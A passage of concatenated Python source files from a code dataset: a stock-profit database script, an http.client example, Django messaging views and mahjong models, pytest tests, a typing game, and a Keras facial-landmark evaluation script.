%(stock_id,len(results),ts.htime(last_mts)))\n\n\t\t\tmin_idx = 0\n\t\t\tmax_idx = len(results)-1\n\t\t\tend_month_close = results[min_idx][5]\n\t\t\tstart_month_close = results[max_idx][5]\n\t\t\t\n\t\t\t#print('%s close=%.3f' %(ts.htime(results[min_idx][3]),results[min_idx][5]))\n\t\t\t#print('%s close=%.3f' %(ts.htime(results[max_idx][3]),results[max_idx][5]))\n\t\t\tadd_stock_profit_query = \"replace into t_stock_month_profit_hk(stock_id,month_ts,last_month_close,curr_month_close,diff) \\\n\t\t\t\t\t\tvalues('%s',%d,%.3f,%.3f,%.3f)\" \\\n\t\t\t\t\t% (stock_id,last_mts,start_month_close,end_month_close,(end_month_close-start_month_close))\n\t\t\tcur.execute(add_stock_profit_query)\n\t\t\ttarget_mts = last_mts\n\t\t\tinsert_sql_num += 1\n\n\t\tconn.commit()\n\n\n\tlog.write(\"%f search stock_num=%d, insert data=%d\\n\" %(time.time(),stocks_num,insert_sql_num))\n\tlog.write(\"%f daily_calc_ma end\\n\" %(time.time()))\n\tlog.close()\n\tcur.close()\n\tconn.close()\n\n\n\nrun()\n\t\n\n","sub_path":"sh/daily_month_profit_calc.py","file_name":"daily_month_profit_calc.py","file_ext":"py","file_size_in_byte":2567,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
+{"seq_id":"240900132","text":"# * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *\n# Time 2018/9/23 3:03 PM \n# Author purplecity \n# Name python_cookbook_11_1.py \n# Description \n# * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *\n\n# This one is about request, which I have used long ago\n# except that it also has operations like .text and .json\n\nfrom http.client import HTTPConnection\nfrom urllib import parse\n\nc=HTTPConnection('www.python.org',80)\nc.request(\"HEAD\",'/index.html')\nresp=c.getresponse()\n\nprint(\"Status\",resp.status)\nfor name,value in resp.getheaders():\n    print(name,value)\n\n\n# Feels like this part can be skipped\n#anyway the standard library is http.client and the awesome library is requests, just use these two\n# passing cookies, uploading files, supplying custom HTTP headers, auth with username/password etc. can all be done with requests\n","sub_path":"before20190507/AboutPython/cookbook/chapter11/python_cookbook_11_1.py","file_name":"python_cookbook_11_1.py","file_ext":"py","file_size_in_byte":975,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
+{"seq_id":"530108371","text":"from django.http import Http404, HttpResponseRedirect\nfrom django.shortcuts import render, get_object_or_404\nfrom django.contrib import messages\nfrom django.contrib.auth.decorators import login_required\nfrom django.utils.translation import ugettext as _\nfrom django.utils import timezone\n\ntry:\n    from django.core.urlresolvers import reverse\nexcept ImportError:\n    from django.urls import reverse\n\nfrom django_messages.models import Message\nfrom django_messages.forms import ComposeForm\nfrom django_messages.utils import format_quote, get_user_model, get_username_field\n\nUser = get_user_model()\n\n\n@login_required\ndef inbox(request, template_name='django_messages/inbox.html'):\n    message_list = Message.objects.inbox_for(request.user)\n    return render(request, template_name, {\n        'message_list': message_list,\n    })\n\n\n@login_required\ndef outbox(request, template_name='django_messages/outbox.html'):\n    message_list = Message.objects.outbox_for(request.user)\n    return render(request, template_name, {\n        'message_list': message_list,\n    })\n\n\n@login_required\ndef trash(request, template_name='django_messages/trash.html'):\n    message_list = Message.objects.trash_for(request.user)\n    return render(request, template_name, {\n        'message_list': message_list,\n    })\n\n\n@login_required\ndef compose(request, recipient=None, form_class=ComposeForm,\n            
template_name='django_messages/compose.html', success_url=None,\n recipient_filter=None):\n if request.method == \"POST\":\n sender = request.user\n form = form_class(request.POST, recipient_filter=recipient_filter)\n if form.is_valid():\n form.save(sender=request.user)\n messages.info(request, _(u\"Message successfully sent.\"))\n if success_url is None:\n success_url = reverse('messages_inbox')\n if 'next' in request.GET:\n success_url = request.GET['next']\n return HttpResponseRedirect(success_url)\n else:\n form = form_class(initial={\"subject\": request.GET.get(\"subject\", \"\")})\n if recipient is not None:\n recipients = [u for u in User.objects.filter(\n **{'%s__in' % get_username_field(): [r.strip() for r in recipient.split('+')]})]\n form.fields['recipient'].initial = recipients\n return render(request, template_name, {\n 'form': form,\n })\n\n\n@login_required\ndef reply(request, message_id, form_class=ComposeForm,\n template_name='django_messages/compose.html', success_url=None,\n recipient_filter=None, quote_helper=format_quote,\n subject_template=_(u\"Re: %(subject)s\"), ):\n parent = get_object_or_404(Message, id=message_id)\n\n if parent.sender != request.user and parent.recipient != request.user:\n raise Http404\n\n if request.method == \"POST\":\n sender = request.user\n form = form_class(request.POST, recipient_filter=recipient_filter)\n if form.is_valid():\n form.save(sender=request.user, parent_msg=parent)\n messages.info(request, _(u\"Message successfully sent.\"))\n if success_url is None:\n success_url = reverse('messages_inbox')\n return HttpResponseRedirect(success_url)\n else:\n form = form_class(initial={\n 'body': quote_helper(parent.sender, parent.body),\n 'subject': subject_template % {'subject': parent.subject},\n 'recipient': [parent.sender, ]\n })\n return render(request, template_name, {\n 'form': form,\n })\n\n\n@login_required\ndef delete(request, message_id, success_url=None):\n user = request.user\n now = timezone.now()\n message = get_object_or_404(Message, id=message_id)\n deleted = False\n if success_url is None:\n success_url = reverse('messages_inbox')\n if 'next' in request.GET:\n success_url = request.GET['next']\n if message.sender == user:\n message.sender_deleted_at = now\n deleted = True\n if message.recipient == user:\n message.recipient_deleted_at = now\n deleted = True\n if deleted:\n message.save()\n messages.info(request, _(u\"Message successfully deleted.\"))\n return HttpResponseRedirect(success_url)\n raise Http404\n\n\n@login_required\ndef undelete(request, message_id, success_url=None):\n user = request.user\n message = get_object_or_404(Message, id=message_id)\n undeleted = False\n if success_url is None:\n success_url = reverse('messages_inbox')\n if 'next' in request.GET:\n success_url = request.GET['next']\n if message.sender == user:\n message.sender_deleted_at = None\n undeleted = True\n if message.recipient == user:\n message.recipient_deleted_at = None\n undeleted = True\n if undeleted:\n message.save()\n messages.info(request, _(u\"Message successfully recovered.\"))\n return HttpResponseRedirect(success_url)\n raise Http404\n\n\n@login_required\ndef view(request, message_id, form_class=ComposeForm, quote_helper=format_quote,\n subject_template=_(u\"Re: %(subject)s\"),\n template_name='django_messages/view.html'):\n user = request.user\n now = timezone.now()\n message = get_object_or_404(Message, id=message_id)\n if (message.sender != user) and (message.recipient != user):\n raise Http404\n if message.read_at is None and 
message.recipient == user:\n message.read_at = now\n message.save()\n\n context = {'message': message, 'reply_form': None}\n if message.recipient == user:\n form = form_class(initial={\n 'body': quote_helper(message.sender, message.body),\n 'subject': subject_template % {'subject': message.subject},\n 'recipient': [message.sender, ]\n })\n context['reply_form'] = form\n return render(request, template_name, context)\n","sub_path":"django_messages/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5885,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"19453869","text":"# import\n## batteries\nimport os\nimport sys\nimport pytest\n## 3rd party\nimport numpy as np\n## package\nfrom DeepMAsED.Commands import Evaluate as Evaluate_CMD\n\n# test/data dir\ntest_dir = os.path.join(os.path.dirname(__file__))\ndata_dir = os.path.join(test_dir, 'data')\n\n# tests\ndef test_help():\n args = ['-h']\n with pytest.raises(SystemExit) as pytest_wrapped_e:\n Evaluate_CMD.parse_args(args)\n assert pytest_wrapped_e.type == SystemExit\n assert pytest_wrapped_e.value.code == 0\n\ndef test_evaluate_r3(tmpdir):\n save_path = tmpdir.mkdir('save_dir')\n model_path = os.path.join(data_dir, 'n1000_r3/', 'model')\n args = [os.path.join(data_dir, 'n1000_r3/'),\n '--model-path', model_path]\n args = Evaluate_CMD.parse_args(args)\n Evaluate_CMD.main(args)\n\ndef test_evaluate_r3_not_syn(tmpdir):\n save_path = tmpdir.mkdir('save_dir')\n model_path = os.path.join(data_dir, 'n1000_r3/', 'model')\n args = [os.path.join(data_dir, 'n1000_r3/'),\n '--model-path', model_path,\n '--is-synthetic', '0']\n args = Evaluate_CMD.parse_args(args)\n Evaluate_CMD.main(args)\n","sub_path":"tests/test_Evaluate.py","file_name":"test_Evaluate.py","file_ext":"py","file_size_in_byte":1122,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"413235866","text":"#!/usr/bin/python\n# __\n# / /___ __ ___ __ __\n# / __/ // / / _ \\/ // /\n# \\__/\\_, (_) .__/\\_, /\n# /___/ /_/ /___/\n\n\nfrom getkey import getkey, keys\nfrom termcolor import colored\nimport sys\nimport os\nimport time\nimport random\n\n\n# for printing via sys.stdout\ndef sysprint(inputstring):\n sys.stdout.write(inputstring)\n sys.stdout.flush()\n\n# just a countdown\ndef countdown():\n os.system('clear')\n print(\"3\")\n time.sleep(1)\n os.system('clear')\n print(\"2\")\n time.sleep(1)\n os.system('clear')\n print(\"1\")\n time.sleep(1)\n os.system('clear')\n\n# print the screen including the information\ndef printScreen():\n os.system('clear')\n timer = time.time() - start\n wpm = ((overallWordCount)/timer)*60\n print(\"WPM: {:.0f} Words: {}/{} Time: {:.3}s Sentences: {}/{} Mistakes: {}\".format(wpm, i, wordCount, timer, done, challengeCount, mistakes))\n print(\"\")\n for j in range(wordCount):\n if ( j < i ):\n sysprint(colored(words[j], 'green')+\" \")\n elif ( j == i ):\n for index in range(min(len(string),len(words[i]))):\n if ( words[i][index] == string[index] ):\n sysprint( colored(words[i][index],'green'))\n elif ( words[i][index] != string[index] ):\n sysprint( colored(words[i][index],'red'))\n for restIndex in range(min(len(string),len(words[i])), len(words[i])):\n sysprint( words[i][restIndex] )\n sysprint(\" \")\n else:\n sysprint(words[j]+\" \")\n print(\"\\n\")\n sysprint(string)\n\n# characters which can be used\nalphabet = \"abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ.,'?!:;-_\"\n\n# open a file and save it line by line in 
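A hardening note on the success_url = request.GET['next'] pattern used by compose, delete and undelete in the views above: the value is redirected to verbatim, so an absolute URL in ?next= turns the view into an open redirect. A hedged sketch, assuming Django 3.0+ (url_has_allowed_host_and_scheme; older releases expose the same check as is_safe_url):

    from django.urls import reverse
    from django.utils.http import url_has_allowed_host_and_scheme

    def safe_success_url(request, fallback='messages_inbox'):
        # Only honour ?next= when it stays on this host; otherwise fall back.
        candidate = request.GET.get('next')
        if candidate and url_has_allowed_host_and_scheme(
                candidate, allowed_hosts={request.get_host()}):
            return candidate
        return reverse(fallback)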
challenge\nf = open(\"sentences\",\"r\")\nchallenge = f.readlines()\n\n# initializing\noverallWordCount = 0\ndone = 0\nwpm = 0\nmistakes = 0\n\n# welcome screen\nos.system('clear')\nprint(\"{} sentences loaded.\".format(len(challenge)))\nchallengeCount=0\nprint(\"How many sentences do you want to type?\")\nwhile(challengeCount<1 or challengeCount>len(challenge)):\n challengeCount = int(input())\n if (challengeCount<1 or challengeCount>len(challenge)):\n os.system('clear')\n print(\"Please enter an amount between 0 and {}:\".format(len(challenge)))\ncountdown()\n\n# timer start\nstart = time.time()\n\nwhile(done < challengeCount):\n i=0\n string=\"\"\n randomChallenge = random.choice(challenge)\n challenge.remove(randomChallenge)\n words = randomChallenge.split()\n wordCount = len(words)\n while (i != wordCount):\n printScreen()\n key = getkey()\n if (key == \" \" or key == keys.ENTER ):\n if(string == words[i]):\n i+=1\n overallWordCount+=1\n printScreen()\n string = \"\"\n continue\n else:\n mistakes+=1\n printScreen()\n string = \"\"\n continue\n if (key == keys.BACKSPACE):\n string = string[:-1]\n continue\n for letter in alphabet:\n if key == letter:\n string = string + letter\n done+=1\n\n# end screen\nprintScreen()\nduration = time.time() - start\nprint(\"You took {:.5}s for {} words.\".format(duration,overallWordCount))\n","sub_path":"ty.py","file_name":"ty.py","file_ext":"py","file_size_in_byte":3297,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"334999361","text":"#-*- coding: utf-8 -*-\n\nfrom __future__ import unicode_literals\n\nfrom django.db import models\n\n\nclass Player(models.Model):\n name = models.CharField(max_length=50, unique=True)\n\n def __str__(self):\n return self.name\n\n\nclass Game(models.Model):\n player1 = models.ForeignKey(Player, on_delete=models.CASCADE, related_name='player1')\n player2 = models.ForeignKey(Player, on_delete=models.CASCADE, related_name='player2')\n player3 = models.ForeignKey(Player, on_delete=models.CASCADE, related_name='player3')\n player4 = models.ForeignKey(Player, on_delete=models.CASCADE, related_name='player4')\n flower = models.DecimalField(null=False, max_digits=9, decimal_places=2, default=0.5)\n lezi = models.IntegerField(null=False, default=5)\n huangfan = models.IntegerField(default=0)\n huangfan_executed = models.IntegerField(default=0)\n finished = models.BooleanField(default=False)\n created = models.DateTimeField(auto_now_add=True)\n prev_game = models.ForeignKey('self', on_delete=models.CASCADE, null=True, blank=True)\n\n def __str__(self):\n return str(self.player1) + ', ' + str(self.player2) + ', ' + str(self.player3) + ', ' + str(self.player4) + ' on ' + str(self.created.date())\n\n\nclass Hand(models.Model):\n name = models.CharField(max_length=50, unique=True)\n multiplier = models.IntegerField(null=False, default=0)\n\n def __str__(self):\n return self.name\n\n\nclass Log(models.Model):\n game = models.ForeignKey(Game, on_delete=models.CASCADE)\n delta1 = models.DecimalField(null=False, max_digits=9, decimal_places=2)\n delta2 = models.DecimalField(null=False, max_digits=9, decimal_places=2)\n delta3 = models.DecimalField(null=False, max_digits=9, decimal_places=2)\n delta4 = models.DecimalField(null=False, max_digits=9, decimal_places=2)\n winner = models.ForeignKey(Player, null=True, blank=True, on_delete=models.CASCADE, related_name='winner')\n flower = models.IntegerField(null=True, blank=True)\n hand = models.ForeignKey(Hand, null=True, blank=True, 
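Two small robustness gaps in the ty.py prompt loop above: int(input()) raises ValueError on non-numeric input, and the retry message says "between 0 and N" although the check actually requires at least 1. A corrected sketch of just that loop:

    def ask_sentence_count(maximum):
        # Re-prompt until the user types an integer in [1, maximum].
        while True:
            try:
                count = int(input("How many sentences do you want to type? "))
            except ValueError:
                print("Please enter a whole number.")
                continue
            if 1 <= count <= maximum:
                return count
            print("Please enter an amount between 1 and {}:".format(maximum))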
on_delete=models.CASCADE)\n _max = models.BooleanField(default=False)\n menqing = models.BooleanField(default=False)\n own = models.BooleanField(default=False)\n loser = models.ForeignKey(Player, null=True, on_delete=models.CASCADE, related_name='loser', blank=True)\n qianggang = models.BooleanField(default=False)\n huangfan = models.BooleanField(default=False)\n gangkai = models.BooleanField(default=False)\n laoyue = models.BooleanField(default=False)\n chengbao = models.ForeignKey(Player, null=True, on_delete=models.CASCADE, related_name='chengbao', blank=True)\n updated = models.DateTimeField(auto_now=True)\n\n def __str__(self):\n if self.winner:\n flowers = ''\n if self.hand:\n if self.hand.multiplier == 0:\n flowers = str(self.flower) + '花 '\n\n if self.own:\n out_str = str(self.winner) + ' 自摸 '\n if self._max:\n out_str += str(self.hand) + ', 大吊车'\n else:\n out_str += flowers + ' ' + str(self.hand)\n if self.gangkai:\n out_str += ', 杠开'\n if self.huangfan:\n out_str += ', 荒番'\n if self.menqing:\n out_str += ', 门清'\n if self.laoyue:\n out_str += ', 海底捞月'\n if self.chengbao:\n out_str += ', ' + str(self.chengbao) + ' 承包'\n elif self.qianggang:\n out_str = str(self.winner) + ' 杠开 '\n if self._max:\n out_str += str(self.hand) + ', 大吊车' + ', ' + str(self.loser) + ' 送杠'\n else:\n out_str += flowers + ' ' + str(self.hand) + ', ' + str(self.loser) + ' 送杠'\n if self.huangfan:\n out_str += ', 荒番'\n if self.menqing:\n out_str += ', 门清'\n if self.laoyue:\n out_str += ', 海底捞月'\n if self.chengbao:\n out_str += ', ' + str(self.chengbao) + ' 承包'\n else:\n out_str = str(self.winner) + ' '\n if self._max:\n out_str += str(self.hand) + ', 大吊车' + ', ' + str(self.loser) + ' 点炮'\n else:\n out_str += flowers + ' ' + str(self.hand) + ', ' + str(self.loser) + ' 点炮'\n if self.gangkai:\n out_str += ', 杠开'\n if self.huangfan:\n out_str += ', 荒番'\n if self.menqing:\n out_str += ', 门清'\n if self.laoyue:\n out_str += ', 海底捞月'\n if self.chengbao:\n out_str += ', ' + str(self.chengbao) + ' 承包'\n return out_str\n else:\n return '荒庄'\n\n\n\n","sub_path":"mahjong/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":5022,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"292271789","text":"# -*- coding: utf-8 -*-\n\"\"\"\n@author: Terada\n\"\"\"\n\nimport numpy as np\nimport matplotlib as mpl\nmpl.use('Agg')\nimport matplotlib.pyplot as plt\nimport os\nimport random as rn\nimport shutil\nimport datetime\nimport csv\nimport glob\nimport pandas as pd\nimport re\nfrom configparser import ConfigParser, ExtendedInterpolation\n\nfrom keras.models import Sequential, model_from_json\nfrom keras.optimizers import SGD, Adadelta, Adagrad, Adam, Adamax, RMSprop, Nadam\nfrom keras.utils import np_utils\nfrom keras import backend as K\nimport tensorflow as tf\n\nimport src.read_image as imread_mod\nimport src.read_text as txtread_mod\nfrom src.data_generation import DatasetGeneration\nimport src.build_network as net\n\nclass Evaluate():\n def __init__(self, str1='Image', str2='land'):\n self.gd = DatasetGeneration(str1, str2)\n self.config = ConfigParser(interpolation=ExtendedInterpolation())\n self.flag_of_start = True\n\n def calcDiffLabel(self, _label_csv, _predict, _path):\n name = _path.split('\\\\')[len(_path.split('\\\\')) - 1]\n # get label data\n label_df = pd.read_csv(_label_csv, index_col=0)\n label_index = label_df.index\n label_column = label_df.columns\n # set column and index from label\n pred_df = pd.DataFrame(_predict, columns=label_column, 
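The branches of Log.__str__ in the mahjong models above repeat the same huangfan/menqing/laoyue/chengbao suffix checks. As a refactoring sketch only (the helper name is hypothetical; branch-specific flags such as gangkai can still be gated by the caller), the shared suffixes can be collected once:

    def _win_suffixes(log):
        # (flag, label) pairs appended identically in each win branch above.
        parts = [label for flag, label in (
            (log.gangkai, '杠开'),
            (log.huangfan, '荒番'),
            (log.menqing, '门清'),
            (log.laoyue, '海底捞月'),
        ) if flag]
        if log.chengbao:
            parts.append('{} 承包'.format(log.chengbao))
        return ''.join(', ' + p for p in parts)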
index=label_index)\n # calc diff (abs)\n diff_df = abs(label_df - pred_df)\n diff_df.to_csv(self.result_path + \"diff_{0}.csv\".format(name))\n # calc cols mean\n #plt.figure()\n diff_df_mean = diff_df.mean()\n diff_df_mean.to_csv(self.result_path + \"col_mean_{0}.csv\".format(name))\n #diff_df_mean.plot.bar()\n #plt.savefig(self.result_path + \"fig_cols_mean_{0}.png\".format(name))\n # calc rows mean\n #plt.figure()\n diffT_df_mean = diff_df.T.mean()\n diffT_df_mean.to_csv(self.result_path + \"row_mean_{0}.csv\".format(name))\n #diffT_df_mean.plot.bar()\n #plt.savefig(self.result_path + \"fig_rows_mean_{0}.png\".format(name))\n\n def prediction_multi(self, _model, _X_test, _path):\n y_predict_all = _model.predict(_X_test)\n y_predict = y_predict_all[0]\n y1_predict = y_predict_all[1]\n y2_predict = y_predict_all[2]\n y3_predict = y_predict_all[3] # add\n half_size = self.input_size.max() / 2\n y_predict[0::2] = (y_predict[0::2] * half_size + half_size) * self.size_ratio[1] + 0.5\n y_predict[1::2] = (y_predict[1::2] * half_size + half_size) * self.size_ratio[0] + 0.5\n y_predict = y_predict.astype(np.int)\n dirname = _path.split('\\\\')[len(_path.split('\\\\')) - 1]\n with open(self.result_path + \"predict_{0}.csv\".format(dirname), 'w', newline='') as f:\n writer = csv.writer(f, lineterminator='\\n')\n header = [landmark_dict[str(i)] for i in range(len(landmark_dict))]\n writer.writerow(header)\n for row in y_predict:\n writer.writerow(row)\n with open(self.result_path + \"predict1_{0}.csv\".format(dirname), 'w', newline='') as f:\n writer = csv.writer(f, lineterminator='\\n')\n header = [genderlabel_dict[str(i)] for i in range(len(genderlabel_dict))]\n writer.writerow(header)\n for row in y1_predict:\n writer.writerow(row)\n with open(self.result_path + \"predict2_{0}.csv\".format(dirname), 'w', newline='') as f:\n writer = csv.writer(f, lineterminator='\\n')\n header = [agelabel_dict[str(i)] for i in range(len(agelabel_dict))]\n writer.writerow(header)\n for row in y2_predict:\n writer.writerow(row)\n ## add d, x, y\n y3_predict[0::3] = (y3_predict[0::3] * half_size + half_size)\n y3_predict[1::3] = (y3_predict[1::3] * half_size + half_size) * self.size_ratio[0]\n y3_predict[2::3] = (y3_predict[2::3] * half_size + half_size) * self.size_ratio[1]\n with open(self.result_path + \"predict3_{0}.csv\".format(dirname), 'w', newline='') as f:\n writer = csv.writer(f, lineterminator='\\n')\n header = [landmark3d_dict[str(i)] for i in range(len(landmark3d_dict))]\n writer.writerow(header)\n for row in y3_predict:\n writer.writerow(row)\n\n return y_predict\n\n def prediction(self, _model, _X_test, _path):\n y_predict = _model.predict(_X_test)\n half_size = self.input_size.max() / 2\n y_predict[0::2] = (y_predict[0::2] * half_size + half_size) * self.size_ratio[1] + 0.5\n y_predict[1::2] = (y_predict[1::2] * half_size + half_size) * self.size_ratio[0] + 0.5\n y_predict = y_predict.astype(np.int)\n dirname = _path.split('\\\\')[len(_path.split('\\\\')) - 1]\n with open(self.result_path + \"predict_{0}.csv\".format(dirname), 'w', newline='') as f:\n writer = csv.writer(f, lineterminator='\\n')\n lm_label = [landmark_dict[str(i)] for i in range(len(landmark_dict))]\n writer.writerow(lm_label)\n for row in y_predict:\n writer.writerow(row)\n\n return y_predict\n\n def calcImageRatio(self):\n self.size_ratio = np.array([self.img_size[0] / self.input_size[0], self.img_size[1] / self.input_size[1]])\n\n def model_evaluation(self, _model, _X_test, _y_test, _path):\n score = _model.evaluate(_X_test, 
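prediction() and prediction_multi() above both undo the training-time normalization with the same (y * half + half) * ratio expression. One caveat worth flagging: on a 2-D (batch, 28) array, y_predict[0::2] slices alternating rows, not the x columns; the sketch below (helper name hypothetical) assumes a flat per-sample vector, and a batched array would need [:, 0::2] / [:, 1::2] instead:

    import numpy as np

    def denormalize_xy(pred, input_max, size_ratio):
        # Map outputs in [-1, 1] back to pixels: x scaled by the width
        # ratio, y by the height ratio, +0.5 to round before truncation.
        half = input_max / 2.0
        out = np.array(pred, dtype=float)
        out[0::2] = (out[0::2] * half + half) * size_ratio[1] + 0.5
        out[1::2] = (out[1::2] * half + half) * size_ratio[0] + 0.5
        return out.astype(int)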
_y_test, batch_size=self.batch_size, verbose=1)\n        dirname = _path.split('\\\\')[len(_path.split('\\\\'))-1]\n        with open(self.save_score, 'a', newline='') as f:\n            writer = csv.writer(f, lineterminator='\\n')\n            if self.flag_of_start:\n                self.flag_of_start = False  # write the header row only once\n                writer.writerows([[\"\",_model.metrics_names[0], _model.metrics_names[1]]])\n            writer.writerow(list([dirname, score[0], score[1]]))\n\n    def run(self):\n        ## Read Data\n        print(\"Read File ...\")\n        self.calcImageRatio()\n        X_test, y_test = self.gd.load_data(self.val_image_path, self.val_label_path, self.save_labelset, self.img_size, self.input_size)\n        y1_test, y2_test = self.gd.load_label() #self.result_path)\n        y3_test = self.gd.load_3ddata(self.val_image_path, self.val_label3d_path, self.save_label3dset, self.img_size, self.input_size)\n\n        models_dir = glob.glob(self.model_path)\n        print(self.model_path)\n        print(models_dir)\n        for model_dir in models_dir:\n            model_dirname = os.path.dirname(model_dir)\n\n            ## Load Model\n            print(\"Load Model : {0}\".format(model_dirname))\n            json_name = '{0}/{1}'.format(model_dirname, self.load_architecture)\n            weights_name = '{0}/{1}'.format(model_dirname, self.load_weights_checkpoint) #\n            if not os.path.exists(weights_name):\n                weights_name = '{0}/{1}'.format(model_dirname, self.load_weights) #load_weights_checkpoint\n\n            model = net.select(self.network, self.input_size, 28)\n            #model = model_from_json(open(json_name).read())\n            model.load_weights(weights_name)\n            model.compile(optimizer=Adam(), loss='mean_squared_error', metrics=['accuracy'])\n\n            ## Predict TestData\n            print(\"Predict TestData ...\")\n            if not self.isMultiTask:\n                self.model_evaluation(model, X_test, y_test, model_dirname)\n                y_pre = self.prediction(model, X_test, model_dirname)\n            else:\n                #self.model_evaluation(model, X_test, [y_test, y1_test, y2_test], model_dirname)\n                self.model_evaluation(model, X_test, [y_test, y1_test, y2_test, y3_test], model_dirname)\n                y_pre = self.prediction_multi(model, X_test, model_dirname)\n\n            ## Evaluate Model\n            print(\"Evaluate Model ...\")\n            self.calcDiffLabel(self.save_labelset, y_pre, model_dirname)\n\n    def setParameter(self, _conf_file):\n        self.config.read(_conf_file)\n\n        ## Image Data\n        conf_io = self.config['IO']\n        self.img_size = np.array([conf_io.getint('image_height'),conf_io.getint('image_width')])\n        self.input_size = np.array([conf_io.getint('input_height'),conf_io.getint('input_width')])\n        self.input_size = self.input_size.astype(np.int)\n\n        ## Dataset\n        conf_d = self.config['Dataset']\n        testName = conf_d['base_test']\n        testOther = conf_d['base_test_plus']\n        self.val_image_path = '{0}//{1}{2}//*.jpg'.format(conf_d['image_path'], testName, testOther)\n        self.val_label_path = '{0}//{1}{2}//*.txt'.format(conf_d['label_path'], testName, testOther)\n        self.val_label3d_path = '{0}//{1}{2}//*.txt'.format(conf_d['label3d_path'], testName, testOther)\n        comment=conf_d['comment']\n        targetPath = conf_d['target_path']\n\n        ## Result\n        now = datetime.datetime.now()\n        time = \"{0:02d}{1:02d}{2:02d}{3:02d}\".format(now.month, now.day, now.hour, now.minute)\n        self.result_path = './result/{0}/{1}_{2}_{3}/'.format(targetPath, testName, comment, time)\n        os.makedirs(self.result_path, exist_ok=True)\n\n        ## Parameter\n        conf_p = self.config['Parameter']\n        self.batch_size = conf_p.getint('batch_size') #128\n        self.network = conf_p['net']\n\n        ## Malti-Task\n        conf_m = self.config['MaltiTask']\n        self.isMultiTask = conf_m.getboolean('multi_task_on')\n\n        ## Filename\n        conf_s = self.config['File']\n        self.load_architecture = 
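model_evaluation() above guards the score.csv header row with an instance flag. A flag-free alternative sketch: write the header only when the target CSV is missing or still empty, which also survives restarts of the evaluation script:

    import csv
    import os

    def append_score(path, row, header):
        # Header goes in once, on first creation; later calls only append.
        need_header = not os.path.exists(path) or os.path.getsize(path) == 0
        with open(path, 'a', newline='') as f:
            writer = csv.writer(f, lineterminator='\n')
            if need_header:
                writer.writerow(header)
            writer.writerow(row)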
conf_s['architecture'] #'architecture.json'\n self.load_weights = conf_s['weights'] #'weights.h5'\n self.load_weights_checkpoint = conf_s['weights_checkpoint'] #'weights_checkpoint.h5'\n self.save_labelset = self.result_path + conf_s['labelset'] #'label.csv'\n self.save_label3dset = self.result_path + conf_s['label3dset'] \n self.save_score = self.result_path + conf_s['score'] #'score.csv'\n self.model_path = conf_s['model_path']\n\nlandmark_dict = {'0':'left_eye_outer_corner_x',\n '1':'left_eye_outer_corner_y',\n '2':'left_eye_inner_corner_x',\n '3':'left_eye_inner_corner_y',\n '4':'right_eye_inner_corner_x',\n '5':'right_eye_inner_corner_y',\n '6': 'right_eye_outer_corner_x',\n '7': 'right_eye_outer_corner_y',\n '8': 'left_nose_top_x',\n '9': 'left_nose_top_y',\n '10': 'left_nose_bottom_x',\n '11': 'left_nose_bottom_y',\n '12': 'right_nose_top_x',\n '13': 'right_nose_top_y',\n '14': 'right_nose_bottom_x',\n '15': 'right_nose_bottom_y',\n '16': 'nose_root_x',\n '17': 'nose_root_y',\n '18': 'mouth_center_top_lip_x',\n '19': 'mouth_center_top_lip_y',\n '20': 'mouth_left_corner_x',\n '21': 'mouth_left_corner_y',\n '22': 'mouth_center_bottom_lip_x',\n '23': 'mouth_center_bottom_lip_y',\n '24': 'mouth_right_corner_x',\n '25': 'mouth_right_corner_y',\n '26': 'mouth_center_lip_x',\n '27': 'mouth_center_lip_y'}\n\ngenderlabel_dict = {'0':'man',\n '1':'woman'}\n\nagelabel_dict = {'0':'20',\n '1':'30',\n '2':'40',\n '3':'50',\n '4':'60'}\n\nlandmark3d_dict = {'0':'left_eye_outer_corner_x',\n '1':'left_eye_outer_corner_y',\n '2':'left_eye_outer_corner_z',\n '3':'left_eye_inner_corner_x',\n '4':'left_eye_inner_corner_y',\n '5':'left_eye_inner_corner_z',\n '6':'right_eye_inner_corner_x',\n '7':'right_eye_inner_corner_y',\n '8':'right_eye_inner_corner_z',\n '9': 'right_eye_outer_corner_x',\n '10': 'right_eye_outer_corner_y',\n '11': 'right_eye_outer_corner_z',\n '12': 'left_nose_top_x',\n '13': 'left_nose_top_y',\n '14': 'left_nose_top_z',\n '15': 'left_nose_bottom_x',\n '16': 'left_nose_bottom_y',\n '17': 'left_nose_bottom_z',\n '18': 'right_nose_top_x',\n '19': 'right_nose_top_y',\n '20': 'right_nose_top_z',\n '21': 'right_nose_bottom_x',\n '22': 'right_nose_bottom_y',\n '23': 'right_nose_bottom_z',\n '24': 'nose_root_x',\n '25': 'nose_root_y',\n '26': 'nose_root_z',\n '27': 'mouth_center_top_lip_x',\n '28': 'mouth_center_top_lip_y',\n '29': 'mouth_center_top_lip_z',\n '30': 'mouth_left_corner_x',\n '31': 'mouth_left_corner_y',\n '32': 'mouth_left_corner_z',\n '33': 'mouth_center_bottom_lip_x',\n '34': 'mouth_center_bottom_lip_y',\n '35': 'mouth_center_bottom_lip_z',\n '36': 'mouth_right_corner_x',\n '37': 'mouth_right_corner_y',\n '38': 'mouth_right_corner_z',\n '39': 'mouth_center_lip_x',\n '40': 'mouth_center_lip_y',\n '41': 'mouth_center_lip_z'}\n\n\nif __name__ == \"__main__\":\n\n ev = Evaluate('Image', 'yland')\n config_files = glob.glob(\"./param/batch_ev/base/*.ini\")\n for conf in config_files:\n ev.setParameter(conf)\n ev.run()\n\n","sub_path":"evaluate.py","file_name":"evaluate.py","file_ext":"py","file_size_in_byte":13545,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"563567079","text":"import pytest\n\n\ndef test_calc_sasa():\n from pyxmolpp2.pdb import PdbFile\n from pyxmolpp2.geometry import calc_sasa\n from timeit import default_timer as timer\n import numpy as np\n import glob\n\n for filename in 